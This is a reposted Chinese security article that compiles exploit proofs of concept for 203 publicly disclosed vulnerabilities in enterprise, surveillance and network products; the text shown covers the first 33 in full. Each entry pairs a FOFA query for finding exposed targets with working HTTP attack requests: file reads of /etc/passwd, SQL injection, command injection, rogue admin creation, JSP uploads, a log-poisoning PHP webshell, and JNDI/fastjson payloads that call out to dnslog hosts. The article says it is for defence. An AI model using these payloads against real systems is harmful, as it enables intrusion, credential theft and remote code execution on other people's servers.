Compilation of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29
道一安全, 2024-06-05 07:41, Beijing
The following article originally appeared on 网络安全新视界 (author: 网络安全新视界).

Purpose: exploitation of N-day vulnerabilities makes up a large share of real-world attacks, and this article is meant to help with defence; defenders can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: all vulnerabilities listed are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few PoCs that are too long have been replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal notice: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; press F12 and search for a keyword to use it.

Bookmark this article if you find it useful, or follow the public account (网络安全新视界).

Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. 泛微 E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立讯 communications command-and-dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command-and-dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command-and-dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command-and-dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire and rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system (PACS) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully automated parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behaviour management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 full-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

02

1. StarRocks MPP database unauthorized access
FOFA:title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA:title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA:title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA:title="EasyCVR"

Set the password parameter to the MD5 of the password you want.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA:title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA:title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA:body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA:icon_hash="-1344736688"
After logging into the backend with the default admin account, send the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA:app="Doccms"
GET /search/index.php?keyword…
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA:icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA:title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


POST request: the planted function executes a command supplied as base64.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Send the following request to the target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA:app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA:body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA:body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA:title="HFOffice"
The PoC calls a function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA:app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA:app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA:app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA:body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}


23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA:icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
